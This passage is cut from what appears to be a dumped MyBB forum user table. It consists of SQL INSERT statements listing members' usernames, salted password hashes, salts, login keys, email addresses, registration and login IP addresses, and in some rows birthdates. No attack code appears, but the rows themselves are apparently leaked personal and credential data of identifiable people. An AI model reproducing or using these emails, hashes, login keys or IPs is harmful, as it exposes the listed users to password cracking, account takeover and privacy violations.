`suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('18', 'MartyFogerlie', '2f56e62cc98b0a26d930758695e13e7b', '2y2n8rsP', 'Iydnnoaf8zDBxFOfWUCONgpPBu7hN2LZg6knW3hJzg1ifqkMEY', 'mary.jon28@yahoo.com', '1', '', '', '', '2', '', '0', '', '1342428979', '1342429062', '1342429062', '1342429044', '', '0', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '2', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '', '', '0', '0', '0', '115.249.239.138', '115.249.239.138', '1945759626', '1945759626', '', '87', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '1', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('19', 'yazz', '7708f2c57cfff52639bb531c1a1d06b7', 'rPHxmRuz', '9WLZH9tQctaKMEjZ1zquO76w5mDFMPig2w65HCRTrQSWWLI79F', 'Yasin.yusuf23@yahoo.com', '2', '', '', '', '2', '', '0', '', '1342470546', '1345145544', '1344372372', '1345145459', '', '0', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '', '0', '0', '', '', '10', '0', '0', '0', '', '', '', '0', '0', '0', '', '41.174.5.68', '0', '699270468', '', '1428', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '1', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('20', 'JakeUS', '5740be169e3acaf01303c9569808e04e', 'fUMjf4El', 'O75ENNWMeueY7gKlT9qGEig3QLN1VCcnq8YoKVSG7t5UaMXyoQ', 'jakeushf123@gmail.com', '47', '', '', '', '2', '', '0', '', '1343915769', '1350505107', '1350167815', '1347927900', '', '0', '', '', '', '', 'all', '[align=center][img]http://i.imgur.com/T3xOc.png[/img][/align]', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '0', '0', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '0', '3', '10', '24.59.244.35', '24.59.243.229', '406582307', '406582245', '', '26379', '1', '16', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '5', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('23', 'menaji13@hotmail.com', '44b8a295f4f2729db7dde4672a070727', 'oXynwrEM', '229uXyUqZQttMmqvuCPDRIoFxo9iSTGjMrL88n4D9wahoFILjO', 'menaji13@hotmail.com', '0', '', '', '', '2', '', '0', '', '1343946510', '1348018274', '1343947908', '0', '', '0', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '0', '0', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '', '', '0', '0', '0', '87.55.209.8', '72.231.24.165', '1463275784', '1223104677', '', '431', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('24', 'vtec4life', '208cb20b2a99b489e8f9c91d3569f0cc', 'Gub7fTmC', 'qzHJtTLpSvYS45mCW6yrgLJokMtopCpeNZvTV5bbD55zFu3fy7', 'vtecv@ymail.com', '0', '', '', '', '2', '', '0', '', '1343950326', '1343975842', '1343954225', '0', '', '0', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '0', '0', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '', '', '0', '0', '0', '97.94.186.133', '97.94.186.133', '1633598085', '1633598085', '', '474', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('26', 'bixlow803', 'f3499ee5cc99f639896dd1226e688800', 'sFC8uKm3', 'f7feFAoYf6aith4IgcFW5wBLa7nZOYRvo6evv2DJ7NBi2dBvE3', 'bixlowhood@ymail.com', '3', '', '', '', '2', '', '0', '', '1343987521', '1344841701', '1344630735', '1344118953', '', '0', '', '', '', '', 'all', '', '1', '1', '0', '0', '1', '0', '2', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '', '', '0', '0', '0', '203.177.42.214', '121.54.53.253', '-877581610', '2033595901', '', '2555', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('27', 'Hil', 'b5ea60cbe2244f8215251793045441d6', 'B8QUP8R7', 'g8PjaO5PjGncqYSls8MuUiagcMVdfJTdb4vXWa2ujHwYhzeLEj', 'kristoffer_laukamp@hotmail.com', '2', '', '', '', '2', '', '0', '', '1343995649', '1349778347', '1348018288', '1344282662', '', '0', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '0', '0', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '1**Inbox$%%$2**Sent Items$%%$3**Drafts$%%$4**Trash Can', '', '0', '0', '0', '80.72.152.146', '80.72.152.146', '1346934930', '1346934930', '', '1743', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '1', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('31', 'based', 'fa39b3a14ab522c616c241a5e0f1a8df', '7oFW7hXv', 'PWwgQYpl8C4sFZborbnkm4UeP9zuPvEZpS4pLb7wkVknIgdmhd', 'itaskforce96@yahoo.com', '0', './uploads/avatars/avatar_31.png?dateline=1344084360', '120|120', 'upload', '2', '', '0', '', '1344084212', '1348018305', '1344084386', '0', '', '0', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '2', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '8', '0', '2', '', '', '10', '0', '0', '0', '', '1**Inbox$%%$2**Sent Items$%%$3**Drafts$%%$4**Trash Can', '', '20', '0', '0', '174.61.77.86', '72.231.24.165', '-1371714218', '1223104677', 'english', '177', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('45', 'dstaire7', 'b5ef8a26ebc0b06711ebbbe73668940e', 'zH2BkdFG', 'kH2sf6gpe84v9hqDgugUIj2ElcnYKHsocUf2DdEFISJLIWMg9f', 'dstaire7@gmail.com', '0', '', '', '', '2', '', '0', '', '1344882945', '1344883160', '1344882945', '0', '', '0', '', '', '', '', 'all', '', '0', '0', '0', '0', '0', '0', '0', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '', '', '0', '0', '0', '117.204.211.6', '117.204.211.6', '1976357638', '1976357638', '', '215', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('44', 'M4573RH4X0R', '35828267644205fb7e6b77f931cb551c', 'ojF9XPe7', 'y6ykX9sCinfZRGdO2bkEYaXamGQOnWscV2wiQvSLMWyvORjxgT', 'malitschr@gmail.com', '2', '', '', '', '2', '', '0', '', '1344830476', '1344876923', '1344831283', '1344831216', '', '0', '', '', '', '', 'all', '', '1', '0', '2', '0', '1', '0', '1', '1', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-5', '1', '2', '', '', '10', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '0', '0', '0', '207.172.50.206', '207.172.50.206', '-810798386', '-810798386', '', '856', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('48', 'BurnsH4X', '2c67f3827aa89f8d2e61e6ed16f0c2b8', 'VAWNjDht', 'qkAax1EB3yojN51X1utPxILDlP5A7awaxYQKkWCWTSbTG8zDjs', 'red-67-22@hotmail.com', '10', '', '', '', '2', '', '0', '', '1344941742', '1351967295', '1351949787', '1346342033', '', '0', '', '', '', '', 'all', '', '0', '1', '1', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '0', '0', '-4', '0', '2', '100', '', '10', '0', '0', '0', '', '1**Inbox$%%$2**Sent Items$%%$3**Drafts$%%$4**Trash Can', '', '0', '0', '0', '78.133.53.116', '195.158.72.91', '1317352820', '-1013036965', 'english', '34237', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '2', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('50', 'sana khan', '3b8a60eb180f135a8ab6ea33be3d3138', 'HSziqtSh', 'sItm8oiT7M9lGbPHLh8Uo1EHCcaQWzIY6LfN3txdgYFhHnQr2e', 'engr.swe.001@gmail.com', '4', './uploads/avatars/avatar_50.jpg?dateline=1344955086', '76|150', 'upload', '2', '', '0', '', '1344952462', '1346448942', '1345601732', '1345135217', '', '0', '', '', '', '19-9-1991', 'all', '', '1', '0', '0', '0', '1', '0', '1', '1', 'linear', '1', '1', '1', '1', '0', '0', '0', '10', '0', '-4', '0', '2', '1', '', '10', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', 'i am a student of software engineering(final year).', '0', '0', '0', '182.177.26.34', '182.177.53.90', '-1229907422', '-1229900454', '', '12585', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '2', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('51', 'SAPBasisWorld', '89d441b29348f1866fef556864023f17', 'dIu8zcJv', 'NGiYhVsik4HSUrGddsYZlSSDDBSjYQKf9Sboa2NR5bcW3GdXQP', 'bogalaaruna@hotmail.com', '1', '', '', '', '2', '', '0', '', '1344956262', '1344958318', '1344956262', '1344957203', '', '0', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '0', '0', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '1**Inbox$%%$2**Sent Items$%%$3**Drafts$%%$4**Trash Can', '', '0', '0', '0', '180.215.45.255', '180.215.45.255', '-1260966401', '-1260966401', '', '2056', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '1', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('231', 'Rhythm', 'e840ce4f009622322ada551541121384', 'v5eqEPwm', 'cIs8U8q8lKnhCO2XkGUU83oAU1hvUQVqQpfJo5n2AY4BLfy9Ce', 'Rhythm@BIGheckers.com', '1', '', '', '', '7', '', '0', '', '1349643098', '1350428909', '1350419800', '1349643453', '', '0', '', '', '', '24-11-1996', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '0', '0', '0', '99.233.52.247', '72.231.24.165', '1676227831', '1223104677', '', '785', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '0'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('53', 'sirchamp', '0106e8d7a16555e5947a5d6eaee8318c', 'uWeBgwZE', 'tbHy9JZ19pFxQei5CN6HXrYWgHA7kjzjHBRBwJNZ5QihNwDBN8', 'phonomarco@yahoo.de', '181', './uploads/avatars/avatar_53.jpg?dateline=1344976802', '120|92', 'upload', '9', '17,21', '9', '', '1344976570', '1352823357', '1352744517', '1352663068', '', '0', '', '', '', '', 'all', '[img]http://teamlegitclan.files.wordpress.com/2007/09/steamupdate9rr.gif[/img] ', '1', '1', '0', '0', '1', '0', '1', '1', 'linear', '1', '1', '1', '1', '0', '0', '0', '0', '0', '-1', '0', '2', '', '', '10', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '0', '0', '19', '188.155.56.90', '188.155.56.90', '-1130678182', '-1130678182', 'english', '211295', '1', '51', '0', '15', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'a:3:{s:4:\"acid\";a:2:{i:13;a:5:{s:4:\"acid\";i:13;s:4:\"name\";s:5:\"Gamer\";s:5:\"image\";s:59:\"inc/plugins/achivements/upload/custom_21_10_12_12_15_49.gif\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:0;}i:27;a:5:{s:4:\"acid\";i:27;s:4:\"name\";s:5:\"Elite\";s:5:\"image\";s:58:\"inc/plugins/achivements/upload/custom_21_10_12_6_51_13.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:0;}}s:4:\"apid\";a:1:{i:3;a:5:{s:4:\"apid\";i:3;s:4:\"name\";s:13:\"Cheers on 100\";s:5:\"image\";s:57:\"inc/plugins/achivements/upload/posts_21_10_12_1_37_43.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}}s:4:\"atid\";a:1:{i:2;a:5:{s:4:\"atid\";i:2;s:4:\"name\";s:10:\"10 Threads\";s:5:\"image\";s:59:\"inc/plugins/achivements/upload/threads_21_10_12_1_39_03.jpg\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}}}', '21', '0'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, 